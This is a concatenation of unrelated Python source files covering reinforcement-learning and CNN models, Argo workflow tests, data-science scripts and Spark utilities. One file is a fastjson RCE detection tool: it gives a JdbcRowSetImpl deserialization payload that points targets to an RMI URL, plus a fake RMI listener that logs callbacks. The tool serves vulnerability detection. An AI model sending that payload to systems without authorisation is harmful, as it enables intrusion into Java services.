    def __init__(self, num_features, num_actions):
        super().__init__()
        self._num_features = num_features
        self._num_actions = num_actions
        # Scalar state-value branch (attribute names preserved for state_dict).
        self._value_head = tc.nn.Sequential(
            tc.nn.Linear(num_features, num_features, bias=True),
            tc.nn.ReLU(),
            tc.nn.Linear(num_features, 1, bias=True)
        )
        # Per-action advantage branch; the final layer is bias-free since any
        # constant offset is absorbed by the value branch.
        self._advantage_head = tc.nn.Sequential(
            tc.nn.Linear(num_features, num_features, bias=True),
            tc.nn.ReLU(),
            tc.nn.Linear(num_features, num_actions, bias=False)
        )

    @property
    def num_actions(self):
        """Number of discrete actions."""
        return self._num_actions

    def forward(self, x):
        """Return Q-values [..., num_actions] for features [..., num_features]."""
        value = self._value_head(x)
        advantage = self._advantage_head(x)
        centered = advantage - advantage.mean(dim=-1, keepdim=True)
        return value + centered
|
#
# Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from unittest.mock import MagicMock, mock_open, patch
from typing import List
from platform_resources.workflow import ArgoWorkflow
workflow_w_two_param = ArgoWorkflow()
workflow_w_two_param.body = {'spec': {'arguments': {'parameters': [{'name': 'test-param-1', 'value': 'test-value-1'},
{'name': 'test-param-2', 'value': 'test-value-2'}]}}}
workflow_wo_value = ArgoWorkflow()
workflow_wo_value.body = {'spec': {'arguments': {'parameters': [{'name': 'test-param-1', 'value': 'test-value-1'},
{'name': 'test-param-2'}]}}}
process_template = '''
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: process-template-
spec:
entrypoint: process-template
templates:
{}
- name: process-template
container:
image: "process-image"
command: [process-command]
args: ["-test-param"]
tolerations:
- key: "master"
operator: "Exists"
effect: "NoSchedule"
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: master
operator: In
values:
- "True"
'''
workflow_template = '''
---
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: workflow-template
spec:
entrypoint: {}
arguments:
parameters:
- name: cluster-registry-address
- name: saved-model-dir-path
- name: additional-params
value: ''
volumes:
- name: input-home
persistentVolumeClaim:
claimName: input-home
- name: input-public
persistentVolumeClaim:
claimName: input-public
- name: output-home
persistentVolumeClaim:
claimName: output-home
- name: output-public
persistentVolumeClaim:
claimName: output-public
templates:
{}
- name: workflow-template
inputs:
parameters:
- name: cluster-registry-address
- name: saved-model-dir-path
- name: additional-params
container:
image: "{{inputs.parameters.cluster-registry-address}}/nauta/openvino-mo:1.5.12-dev"
command: [bash]
args: ["-c", "python3 mo.py --saved_model_dir {{inputs.parameters.saved-model-dir-path}} --output_dir /mnt/output/home/{{workflow.name}} {{inputs.parameters.additional-params}}"]
volumeMounts:
- name: input-home
mountPath: /mnt/input/home
readOnly: True
- name: input-public
mountPath: /mnt/input/root
readOnly: True
- name: output-home
mountPath: /mnt/output/home
- name: output-public
mountPath: /mnt/output/root
readOnly: True
- name: output-public
mountPath: /mnt/output/root/public
subPath: public
- name: input-public
mountPath: /mnt/input/root/public
subPath: public
tolerations:
- key: "master"
operator: "Exists"
effect: "NoSchedule"
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: master
operator: In
values:
- "True"
'''
workflow_steps = '''- name: step-template
inputs:
parameters:
- name: cluster-registry-address
- name: saved-model-dir-path
- name: additional-params
steps:
- - name: step1
template: step1-template
arguments:
parameters:
- name: cluster-registry-address
- name: saved-model-dir-path
- name: additional-params
'''
def test_parameters():
    # The parameters property flattens spec.arguments.parameters into a dict.
    assert workflow_w_two_param.parameters == {'test-param-1': 'test-value-1', 'test-param-2': 'test-value-2'}
def test_set_parameters():
    # Assigning a subset only overwrites the named parameters; others keep
    # their existing values.
    workflow_w_two_param.parameters = {'test-param-2': 'new-value'}
    assert workflow_w_two_param.parameters == {'test-param-1': 'test-value-1', 'test-param-2': 'new-value'}
def test_set_parameters_error():
    # Assigning parameters raises KeyError — presumably because the sibling
    # parameter in workflow_wo_value lacks a 'value' key; confirm in
    # ArgoWorkflow.parameters.
    with pytest.raises(KeyError):
        workflow_wo_value.parameters = {'test-param-1': 'new-value'}
def test_wait_for_completion(mocker):
    # When get() reports phase 'Succeeded', wait_for_completion() polls once
    # and returns without raising.
    workflow_status_mock = MagicMock()
    workflow_status_mock.phase = 'Succeeded'
    get_workflow_mock = mocker.patch('platform_resources.workflow.ArgoWorkflow.get', return_value=workflow_status_mock)
    test_workflow = ArgoWorkflow()
    test_workflow.wait_for_completion()
    assert get_workflow_mock.call_count == 1
def test_wait_for_completion_failure(mocker):
    # A 'Failed' phase must surface as RuntimeError after a single poll.
    workflow_status_mock = MagicMock()
    workflow_status_mock.phase = 'Failed'
    get_workflow_mock = mocker.patch('platform_resources.workflow.ArgoWorkflow.get', return_value=workflow_status_mock)
    test_workflow = ArgoWorkflow()
    with pytest.raises(RuntimeError):
        test_workflow.wait_for_completion()
    assert get_workflow_mock.call_count == 1
def check_parameters(parameters: List[dict]):
    """Assert that the three mandatory workflow parameters are present.

    Raises AssertionError when 'cluster-registry-address',
    'saved-model-dir-path' or 'additional-params' is missing (checked in
    that order), and KeyError if an entry has no 'name' key.
    """
    names = [parameter['name'] for parameter in parameters]
    for required in ('cluster-registry-address',
                     'saved-model-dir-path',
                     'additional-params'):
        assert required in names
def test_add_proces_add_steps(mocker):
    # add_process() on a step-less workflow: the process becomes an extra
    # template, and a combined '<workflow>-<process>' steps template is
    # generated and made the entrypoint.
    # NOTE(review): 'proces' typo in the name kept to avoid renaming a test.
    mocker.patch('kubernetes.config.load_kube_config')
    with patch('builtins.open', mock_open(read_data=workflow_template.format('workflow-template', ''))):
        main_workflow = ArgoWorkflow.from_yaml('workflow_template')
    with patch('builtins.open', mock_open(read_data=process_template.format(''))):
        process_workflow = ArgoWorkflow.from_yaml('process_template')
    main_workflow.add_process(process_workflow)
    spec = main_workflow.body['spec']
    assert spec['entrypoint'] == 'workflow-template-process-template'
    list_of_templates = spec['templates']
    process_template_exists = False
    flow_template_exists = False
    for template in list_of_templates:
        if template['name'] == 'workflow-template-process-template':
            flow_template_exists = True
            # The generated steps template must chain both sub-templates...
            assert template.get('steps')
            assert len(template.get('steps')) == 2
            swt = None
            pwt = None
            for step in template.get('steps'):
                step_name = step[0]['name']
                if step_name == 'workflow-template':
                    swt = step
                elif step_name == 'process-template':
                    pwt = step
                # ...and forward the three mandatory parameters to each step.
                parameters = step[0].get('arguments', []).get('parameters', [])
                assert parameters
                check_parameters(parameters)
            assert swt
            assert pwt
        elif template['name'] == 'process-template':
            process_template_exists = True
            parameters = template.get('inputs', []).get('parameters')
            assert parameters
            check_parameters(parameters)
    assert process_template_exists
    assert flow_template_exists
def test_add_process_with_steps(mocker):
    # When the main workflow already has a steps template ('step-template'),
    # add_process() appends the process as a new step there instead of
    # creating a combined entrypoint.
    mocker.patch('kubernetes.config.load_kube_config')
    with patch('builtins.open', mock_open(read_data=workflow_template.format('step-template', workflow_steps))):
        main_workflow = ArgoWorkflow.from_yaml('workflow_template')
    with patch('builtins.open', mock_open(read_data=process_template.format(''))):
        process_workflow = ArgoWorkflow.from_yaml('process_template')
    main_workflow.add_process(process_workflow)
    spec = main_workflow.body['spec']
    assert spec['entrypoint'] == 'step-template'
    list_of_templates = spec['templates']
    process_template_exists = False
    flow_template_exists = False
    step_template_exists = False
    for template in list_of_templates:
        if template['name'] == 'step-template':
            step_template_exists = True
            # Original 'step1' plus the newly appended process step.
            assert template.get('steps')
            assert len(template.get('steps')) == 2
            swt = None
            pwt = None
            for step in template.get('steps'):
                step_name = step[0]['name']
                if step_name == 'step1':
                    swt = step
                elif step_name == 'process-template':
                    pwt = step
                parameters = step[0].get('arguments', []).get('parameters', [])
                assert parameters
                check_parameters(parameters)
            assert swt
            assert pwt
        elif template['name'] == 'workflow-template':
            flow_template_exists = True
        elif template['name'] == 'process-template':
            process_template_exists = True
            parameters = template.get('inputs', []).get('parameters')
            assert parameters
            check_parameters(parameters)
    assert process_template_exists
    assert flow_template_exists
    assert step_template_exists
def test_add_process_with_steps_in_process(mocker):
    # Mirror case: the *process* carries the steps template; the generated
    # combined template must chain the process's step template and the main
    # workflow template.
    mocker.patch('kubernetes.config.load_kube_config')
    with patch('builtins.open', mock_open(read_data=workflow_template.format('workflow-template', ''))):
        main_workflow = ArgoWorkflow.from_yaml('workflow_template')
    with patch('builtins.open', mock_open(read_data=process_template.format(workflow_steps))):
        process_workflow = ArgoWorkflow.from_yaml('process_template')
    main_workflow.add_process(process_workflow)
    spec = main_workflow.body['spec']
    list_of_templates = spec['templates']
    flow_template_exists = False
    for template in list_of_templates:
        if template['name'] == 'workflow-template-process-template':
            flow_template_exists = True
            assert template.get('steps')
            assert len(template.get('steps')) == 2
            swt = None
            pwt = None
            for step in template.get('steps'):
                step_name = step[0]['name']
                if step_name == 'step-template':
                    swt = step
                elif step_name == 'workflow-template':
                    pwt = step
                parameters = step[0].get('arguments', []).get('parameters', [])
                assert parameters
                check_parameters(parameters)
            assert swt
            assert pwt
    assert flow_template_exists
|
import pandas as pd
import numpy as np
from sklearn import linear_model
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn import cross_validation
from sklearn.metrics import cohen_kappa_score, make_scorer
#input = pd.read_csv('features_final/Community_features.csv', index_col = 0)
#input = pd.read_csv('features_final/ProvideEmotion_features.csv', index_col = 0)
#input = pd.read_csv('features_final/ProvideInformation_features.csv', index_col = 0)
# Load one labelled feature matrix (last column is the binary class label).
# NOTE(review): `input` shadows the builtin; DataFrame.ix and the
# sklearn.cross_validation module are removed in modern pandas/sklearn —
# any modernisation should use .iloc and sklearn.model_selection.
input = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/receivedinfo.csv', index_col = 0)
#input = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/provideinfo.csv', index_col = 0)
#input = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/test.csv', index_col = 0, nrows=1000)
#input = pd.read_csv('features_updated/r_original_2_python_5463_post and question mark.csv', index_col = 0)
# Shuffle rows so the 10-fold CV splits are not ordered by collection time.
shuffled_input = input.reindex(np.random.permutation(input.index))
#print shuffled_input
#print(input.columns)
# Baseline: proportion of the negative class (last column == 0).
neg_proportion = len(input[input.ix[:,-1]==0])/float(len(input))
print('Proportion of negative class: '+str(neg_proportion))
#kappa = make_scorer(cohen_kappa_score)
########Logistic Regression###############
#logistic = linear_model.LogisticRegression(class_weight='balanced') # assign class_weight actually make accuracy lower, because more positive class are being identified
# Positive class weighted 2x to counter class imbalance.
logistic = linear_model.LogisticRegression(class_weight={0:1, 1: 2}, penalty='l2')
print('Logistic Regression L2:')
scores = cross_validation.cross_val_score(logistic, shuffled_input.ix[:,0:-1], y=shuffled_input.ix[:,-1],cv = 10, scoring='accuracy')
print("Mean accuracy Logistic Regression from 10-fold cross-validation:")
print(scores.mean())
########Decision Tree###############
# dt = DecisionTreeClassifier(class_weight={0:1, 1:1}, max_depth=10)
# print 'Decision Tree:'
# scores_dt = cross_validation.cross_val_score(dt, shuffled_input.ix[:,0:5452], shuffled_input.ix[:,5452],cv = 10, scoring='accuracy')
# print "Mean accuracy Decision Tree from 10-fold cross-validation:"
# print scores_dt.mean()
##########Support Vector Machine###############
# svm = SVC(class_weight={0:1, 1:1}, kernel='linear')
# print 'SVM Linear Kernel:'
#svm = OneVsRestClassifier(BaggingClassifier(SVC(kernel='linear', probability=True, class_weight='auto'), max_samples=1.0 / n_estimators, n_estimators=n_estimators))
# scores_svm = cross_validation.cross_val_score(svm, shuffled_input.ix[:,0:5452], shuffled_input.ix[:,5452],cv = 10, scoring='accuracy')
# print "Mean accuracy SVM from 10-fold cross-validation:"
# print scores_svm.mean()
##########Gaussian Naive Bayes###############
# gnb = GaussianNB()
# print 'Gaussian Naive Bayes:'
#
# scores_gnb = cross_validation.cross_val_score(gnb, shuffled_input.ix[:,0:5452], shuffled_input.ix[:,5452],cv = 10, scoring='accuracy')
# print "Mean accuracy Gaussian NB from 10-fold cross-validation:"
# print scores_gnb.mean() |
from socket import *
import time
# Round-trip latency probe against a local service on port 25000: sends the
# payload b'30' forever and prints each request's response time in seconds.
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('localhost', 25000))
while True:
    start = time.time()
    sock.send(b'30')
    resp = sock.recv(100)  # NOTE(review): empty reply (closed peer) is not detected
    end = time.time()
    print(end-start)
|
# -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Torch utils."""
import numpy as np
import torch
from modnas.utils import format_value, format_dict
# Currently selected torch device, managed via set_device()/get_device().
_device = None
def version():
    """Return backend version information."""
    # NOTE(review): torch._C._cuda_getCompiledVersion is a private API and may
    # be unavailable on CPU-only builds — confirm before relying on it.
    return format_dict({
        'torch': torch.__version__,
        'cuda': torch._C._cuda_getCompiledVersion(),
        'cudnn': torch.backends.cudnn.version(),
    }, sep=', ', kv_sep='=', fmt_key=False, fmt_val=False)
def init_device(device=None, seed=11235):
    """Seed numpy/torch RNGs; for non-CPU devices also seed CUDA and enable
    cudnn autotuning."""
    np.random.seed(seed)
    torch.manual_seed(seed)
    if device == 'cpu':
        return
    # GPU path: seed every CUDA device and let cudnn pick fast kernels.
    torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.benchmark = True
def set_device(device):
    """Set current device."""
    # Stored module-globally so any caller can retrieve it via get_device().
    global _device
    _device = device
def get_device():
    """Return current device."""
    return _device
def get_dev_mem_used():
    """Return memory used in device."""
    # CUDA-only: currently allocated tensor memory, reported in MiB.
    return torch.cuda.memory_allocated() / 1024. / 1024.
def param_count(model, *args, format=True, **kwargs):
    """Return number of model parameters.

    With ``format=True`` the raw count is passed through ``format_value``
    (extra args/kwargs are forwarded to it); otherwise the int is returned.
    """
    val = sum(p.data.nelement() for p in model.parameters())
    return format_value(val, *args, **kwargs) if format else val
def param_size(model, *args, format=True, **kwargs):
    """Return size of model parameters in bytes (assumes 4-byte elements).

    Bug fix: the original signature lacked the ``format`` keyword, so
    ``if format`` tested the *builtin* ``format`` (always truthy) and an
    explicit ``format=False`` leaked into ``format_value``'s kwargs.
    """
    val = 4 * param_count(model, format=False)
    return format_value(val, *args, binary=True, **kwargs) if format else val
def model_summary(model):
    """Return model summary."""
    # Human-readable parameter count and size; factor/prec are forwarded to
    # format_value via param_count/param_size.
    info = {
        'params': param_count(model, factor=2, prec=4),
        'size': param_size(model, factor=2, prec=4),
    }
    # Double-brace trick: the first format builds '{params}'/'{size}' slots,
    # the second fills them from info.
    return 'Model summary: {}'.format(', '.join(['{k}={{{k}}}'.format(k=k) for k in info])).format(**info)
def clear_bn_running_statistics(model):
    """Reset the running mean/var of every BatchNorm2d module in ``model``."""
    bn_modules = (m for m in model.modules()
                  if isinstance(m, torch.nn.BatchNorm2d))
    for bn in bn_modules:
        bn.reset_running_stats()
def recompute_bn_running_statistics(model, trainer, num_batch=100, clear=True):
    """Recompute BatchNorm running statistics."""
    # Optionally reset the stats, then stream up to num_batch training batches
    # through the model in train mode so the BN buffers are repopulated.
    if clear:
        clear_bn_running_statistics(model)
    is_training = model.training
    model.train()
    with torch.no_grad():
        for _ in range(num_batch):
            try:
                trn_X, _ = trainer.get_next_train_batch()
            except StopIteration:
                # Data exhausted before num_batch batches; stop early.
                break
            model(trn_X)
            del trn_X  # free the batch eagerly to bound memory use
    # Restore the caller's train/eval mode.
    if not is_training:
        model.eval()
|
# fastjson RCE detection: a Python implementation of a minimal RMI server
'''
When probing for fastjson RCE, the rmi:// protocol is commonly used.
If the target can reach the internet, a payload such as
rmi://randomstr.test.yourdomain.com:9999/path can be detected via dnslog.
For internal-only targets, we can instead deploy an RMI server inside the
network and check its log for incoming host requests.
Writing the RMI service in Java is easy, but if you are developing a project
in Python and do not want to invoke Java software, this may help you.
POST data
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://10.183.20.41:20008/TESTPATH",
        "autoCommit":true
    }
}
The code follows.
'''
#!/usr/bin/env python3
import socket
import threading
import struct
def rmi_response(client, address):
    """Handle one client socket of the fake RMI server.

    Replies to the JRMI handshake (magic b"JRMI" = 4a 52 4d 49) with a
    ProtocolAck that echoes the client's address, then reads the follow-up
    lookup call and logs the requested RMI path. Always closes the socket.
    """
    try:
        client.settimeout(5)
        buf = client.recv(1024)
        if b"\x4a\x52\x4d\x49" in buf:
            # ProtocolAck (0x4e) + length-prefixed client host + port.
            send_data = b"\x4e"
            send_data += struct.pack(">h", len(address[0]))
            send_data += address[0].encode()
            send_data += b"\x00\x00"
            send_data += struct.pack(">H", address[1])
            client.send(send_data)
            total = 3  # retry a few reads: recv may deliver partial data
            buf1 = b""
            while total:
                # Bug fix: the counter was never decremented, so a peer that
                # closed early (recv returning b"") caused a busy infinite loop.
                total -= 1
                chunk = client.recv(512)
                if not chunk:  # connection closed by peer
                    break
                buf1 += chunk
                if len(buf1) > 50:
                    break
            if buf1:
                # The lookup path follows the 0xdf74 marker (2-byte length skipped).
                path = bytearray(buf1).split(b"\xdf\x74")[-1][2:].decode(errors="ignore")
                print("data:{}".format(buf1))
                print("client:{} send path:{}".format(address, path))
    except Exception as ex:
        print('run rmi error:{}'.format(ex))
    finally:
        client.close()
def main():
    """Accept connections forever, handling each client on a daemon thread.

    Reads the module globals ``listenip``, ``listenport`` and ``max_conn``.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ip_port = (listenip, listenport)
    sock.bind(ip_port)
    sock.listen(max_conn)
    print("listen: {}:{} maxconnect:{}".format(listenip, listenport, max_conn))
    while True:
        client, address = sock.accept()
        thread = threading.Thread(target=rmi_response, args=(client, address))
        # daemon=True so Ctrl-C on the main thread exits the process;
        # Thread.setDaemon() is deprecated since Python 3.10.
        thread.daemon = True
        thread.start()
if __name__ == '__main__':
    # Listener configuration (module globals read by main()).
    max_conn = 200
    listenip = "0.0.0.0"
    listenport = 20008
    main()
|
import sys
import json
sys.path.insert(0,'..')
def get_stats(team_id, team_name, cache_repository, http_repository):
    """Return a team's stats, serving from cache with an HTTP fallback.

    Cache hits are JSON-decoded before being returned; on a miss, the stats
    are fetched over HTTP and written back to the cache as a JSON string.
    """
    cached = cache_repository.get_team_stats(team_id)
    if cached:
        return json.loads(cached)
    stats = http_repository.get_team_stats(team_id, team_name)
    cache_repository.set_team_stats(team_id, json.dumps(stats))
    return stats
def get_matches(team_id, cache_repository, http_repository):
    """Return a team's matches sorted by kick-off time, newest first.

    Cache-aside like get_stats(): on a miss the matches are fetched over HTTP
    and stored as JSON (in fetch order); hits are decoded from the cached
    JSON string. The returned list is sorted by the 'time' key, descending.
    """
    cached = cache_repository.get_team_matches(team_id)
    if cached:
        matches = json.loads(cached)
    else:
        matches = http_repository.get_team_matches(team_id)
        cache_repository.set_team_matches(team_id, json.dumps(matches))
    matches.sort(key=lambda match: match['time'], reverse=True)
    return matches
|
import pyspark.sql.functions as F
from pyspark.ml import Transformer
from pyspark import keyword_only
from pyspark.ml.param.shared import HasInputCol, HasInputCols, HasOutputCol, \
Params, Param, TypeConverters, HasLabelCol, HasPredictionCol, \
HasFeaturesCol, HasThreshold
from pyspark.ml.util import DefaultParamsReadable, DefaultParamsWritable, \
JavaMLReadable, JavaMLWritable
from pyspark.sql.types import *
__all__ = [
'NullThresholdRemover'
]
class NullThresholdRemover(Transformer, HasThreshold, HasInputCols,
                           DefaultParamsReadable, DefaultParamsWritable):
    """Drops every configured input column whose fraction of null values
    exceeds ``threshold`` (a ratio in [0, 1])."""

    @keyword_only
    def __init__(self, inputCols=None, threshold=0.3) -> None:
        super().__init__()
        self._setDefault(inputCols=inputCols, threshold=threshold)
        kwargs = self._input_kwargs
        self.setParams(**kwargs)

    @keyword_only
    def setParams(self, inputCols=None, threshold=0.3):
        """Set params for this transformer.

        Bug fix: return self (via Params._set), matching the pyspark.ml
        convention — the original returned None, breaking call chaining.
        """
        kwargs = self._input_kwargs
        return self._set(**kwargs)

    def _transform(self, dataset):
        threshold = self.getThreshold()
        # Bug fix: validate explicitly against None and the [0, 1] range;
        # the original `not threshold` wrongly rejected the legal value 0.0.
        if threshold is None or threshold > 1.0 or threshold < 0.0:
            raise ValueError("Invalid threshold value")
        cols = dataset.columns
        datasetRowCount = dataset.count()
        # Only consider configured columns that actually exist in the dataset.
        inputCols = list(set(self.getInputCols()).intersection(cols))
        # Single pass over the data: per-column null ratio.
        colsNullCount = dataset.select(
            [(F.count(F.when(F.col(c).isNull(), c)) / datasetRowCount).alias(c)
             for c in inputCols]).collect()
        colsNullCount = [row.asDict() for row in colsNullCount][0]
        colsGtTh = list(
            {i for i in colsNullCount if colsNullCount[i] > threshold})
        return dataset.drop(*colsGtTh)
from matplotlib import pyplot as plt
import math
import re
import statistics
# Load the RNA structure/frequency dump.
# NOTE(review): the file handle is never closed; prefer a with-block.
f = open("/Users/rafiqkamal/Desktop/Data_Science/RNAProject210110/RNAL20StructuresGSSizes.txt")
contents = f.readlines()
# The original code worked for what is it was made for, but after talking with the lead researcher, I see that the code needs to be a lot more robust in order to print out various graphs of various parts of the RNA structures in order to try and find patterns. To accomplish this, I will not hard code everything, but rather use some more flexible functions, data structures, and algorithms that would, for example, be able to quickly and easily input a few numbers and look at the top twenty frequencies and their corresponding hamming distances graphs, the lowest twenty frequencies and their hamming distances, or a random set of frequencies and look at their hamming distances. In addition, this code needs to be able to quickly plot scatterplots using any of the above examples.
log10_frequency_array = []
frequency_structure_array = []# create a main structure a list to hold the original clean data that will be sorted in ascending order by the frequency
count = 0 # create a count variable (primary key) that will keep track of where the particular frequency is from the original data which has a total around 11K strings
# Each input line holds an integer frequency and a dot-bracket structure;
# store [frequency, log10(frequency), structure], sorted ascending by log10.
for line in contents:
    x = re.findall("\d+",line)
    y = re.findall("[()\.]+",line)
    frequency_structure_array.append([int(x[0]),math.log10(int(x[0])),y[0]])
frequency_structure_array.sort(key=lambda x:x[1])
# Prepend a 1-based rank so each row becomes [rank, frequency, log10, structure].
for line in frequency_structure_array:
    count = count + 1#I added the count on this for loop because the data is not ordered in the above for loop
    line.insert(0,count)
############# 1-index, frequency, log10 of frequency structure
#frequencyArray=[11219, 364197924001, 11.561337465902943, '....................']
def hamming_maker(start, end, array):
    """For each row in array[start:end], compute its Hamming distance to
    every structure in ``array``.

    ``array`` rows are [rank, frequency, log10(frequency), structure].
    Returns a list of [rank, [distances...]] pairs.
    """
    results = []
    for idx in range(start, end):
        reference = array[idx][3]
        distances = [hamming(reference, row[3]) for row in array]
        results.append([array[idx][0], distances])
    return results
####################### 1-indexed ranks paired with hamming distances
# hamming_maker output example: [[11219, [12, 10, ..., 8]], ...]
def hamming(s1, s2):
    """Hamming distance between two equal-length strings.

    Mirrors the original behaviour: unequal lengths print a warning and
    yield 0 rather than raising.
    """
    if len(s1) != len(s2):
        print("Strings are not equal")
        return 0
    return sum(1 for a, b in zip(s1, s2) if a != b)
def histogram_maker(array):
    """Plot one histogram per [rank, distances] pair from hamming_maker();
    the mean distance is embedded in the y-axis label."""
    for arr in array:
        mean = get_mean(arr[1])
        plt.figure( str(arr[0]) + " Histogram")
        plt.hist(arr[1])
        plt.xlabel( "Structure Count: " + str(arr[0]) + " Hamming Distances")
        plt.ylabel("Number of Occurences The mean:" + str(mean))
def get_mean(arr):
    """Arithmetic mean of ``arr``, rounded to 2 decimal places."""
    total = sum(arr)
    return round(total / len(arr), 2)
#Input any range you want from 0 - 11219 which correlates to the ascending order of the frequencies in the original data
# last_20 = hamming_maker(0,11219,frequency_structure_array)####################### count hamming distances
#hamming_maker output = [11219, [12, 10,...8]]
# print(histogram_maker(last_20))
# plt.show(last_20)
# create a scatter_plot_maker function which will take in any two arrays/list and make a scatter plot of them. Again using the count variable to set the title and labels.
# x axis = log10 of frequenciies frequency_structure_array[2]Y
# y axis = the mean of the five smallest hamming distances (sort and last 5)
def log10_list_maker(arr):
    """Extract column 2 (the log10 frequency) from each row of ``arr``."""
    return [row[2] for row in arr]
def scatterplot_maker (arr1_hammings,arr2_log10_freq):
    """Scatter the mean of the five smallest hamming distances against the
    log10 frequencies.

    NOTE(review): currently broken — the mean computation is commented out,
    so `line` and `mean_array` are undefined and calling this raises
    NameError. Restore the commented loop before use.
    """
    log10_frequency_array = log10_list_maker(arr2_log10_freq)
    # mean_array = []
    # for line in arr1_hammings:
    #     smallest5 = sorted(line[1])[0:5]
    #     mean_array.append(get_mean(smallest5))
    plt.figure( "Count:" + str(line[0]) + "Scatter Plot")
    plt.xlabel("Count:" + str(line[0]) + "Mean of the last five Hammings")
    plt.ylabel("log10 Frequencies")
    plt.scatter(mean_array,log10_frequency_array)#take the mean of the five smallest for each
    plt.show()
# Compute distances for the 119 highest-frequency structures (the result is
# currently discarded; see histogram_maker/scatterplot_maker for plotting).
hamming_maker(11100,11219,frequency_structure_array)
# scatterplot_maker(last_20,frequency_structure_array)
# print(frequency_structure_array[:,1])
import pandas as pd
def dataframe_from_csv(path, header=0, index_col=0):
    """Read a CSV into a DataFrame, defaulting to row 0 as the header and
    column 0 as the index."""
    frame = pd.read_csv(path, header=header, index_col=index_col)
    return frame
|
'''@package models
Contains the neural net models and their components
'''
from . import model, model_factory, run_multi_model, dblstm, \
linear, plain_variables, concat, leaky_dblstm, multi_averager,\
feedforward, leaky_dblstm_iznotrec, leaky_dblstm_notrec, dbrnn,\
capsnet, dbr_capsnet, dblstm_capsnet, dbgru, leaky_dbgru, dbresetgru, dbresetlstm, dlstm,\
dresetlstm, leaky_dlstm, encoder_decoder_cnn, regular_cnn, framer, dcnn
|
import torch
from torch import nn, Tensor
from torch.nn import functional as F
class BasicBlock(nn.Module):
    """Residual block with two 3x3 convolutions and no channel expansion."""
    expansion: int = 1

    def __init__(self, c1, c2, s=1, downsample=None) -> None:
        super().__init__()
        # First conv carries the (optional) stride; both are 3x3, padding 1.
        # Attribute names preserved so checkpoint state_dict keys match.
        self.conv1 = nn.Conv2d(c1, c2, 3, s, 1, bias=False)
        self.bn1 = nn.BatchNorm2d(c2)
        self.conv2 = nn.Conv2d(c2, c2, 3, 1, 1, bias=False)
        self.bn2 = nn.BatchNorm2d(c2)
        # Projection applied to the identity path when the shape changes.
        self.downsample = downsample

    def forward(self, x: Tensor) -> Tensor:
        shortcut = x if self.downsample is None else self.downsample(x)
        y = F.relu(self.bn1(self.conv1(x)))
        y = self.bn2(self.conv2(y))
        return F.relu(y + shortcut)
class Bottleneck(nn.Module):
    """Residual block: 1x1 reduce, 3x3 (optionally strided), 1x1 expand 4x."""
    expansion: int = 4

    def __init__(self, c1, c2, s=1, downsample=None) -> None:
        super().__init__()
        # Attribute names preserved so checkpoint state_dict keys match.
        self.conv1 = nn.Conv2d(c1, c2, 1, 1, 0, bias=False)
        self.bn1 = nn.BatchNorm2d(c2)
        self.conv2 = nn.Conv2d(c2, c2, 3, s, 1, bias=False)
        self.bn2 = nn.BatchNorm2d(c2)
        self.conv3 = nn.Conv2d(c2, c2 * self.expansion, 1, 1, 0, bias=False)
        self.bn3 = nn.BatchNorm2d(c2 * self.expansion)
        self.downsample = downsample

    def forward(self, x: Tensor) -> Tensor:
        shortcut = x if self.downsample is None else self.downsample(x)
        y = F.relu(self.bn1(self.conv1(x)))
        y = F.relu(self.bn2(self.conv2(y)))
        y = self.bn3(self.conv3(y))
        return F.relu(y + shortcut)
# Per-variant config: residual block type and blocks per stage (4 stages).
resnet_settings = {
    '18': [BasicBlock, [2, 2, 2, 2]],
    '34': [BasicBlock, [3, 4, 6, 3]],
    '50': [Bottleneck, [3, 4, 6, 3]],
    '101': [Bottleneck, [3, 4, 23, 3]],
    '152': [Bottleneck, [3, 8, 36, 3]]
}
class ResNet(nn.Module):
    """ResNet backbone that returns the feature maps of all four stages."""

    def __init__(self, model_name: str = '50') -> None:
        super().__init__()
        assert model_name in resnet_settings.keys(), f"ResNet model name should be in {list(resnet_settings.keys())}"
        block, depths = resnet_settings[model_name]
        # Stem: 7x7/2 conv + 3x3/2 max-pool -> spatial size H/4 x W/4.
        self.inplanes = 64
        self.conv1 = nn.Conv2d(3, self.inplanes, 7, 2, 3, bias=False)
        self.bn1 = nn.BatchNorm2d(self.inplanes)
        self.maxpool = nn.MaxPool2d(3, 2, 1)
        # Four residual stages; stages 2-4 halve the spatial size.
        self.layer1 = self._make_layer(block, 64, depths[0], s=1)
        self.layer2 = self._make_layer(block, 128, depths[1], s=2)
        self.layer3 = self._make_layer(block, 256, depths[2], s=2)
        self.layer4 = self._make_layer(block, 512, depths[3], s=2)

    def _make_layer(self, block, planes, depth, s=1) -> nn.Sequential:
        """Build one stage of ``depth`` blocks; only the first may stride."""
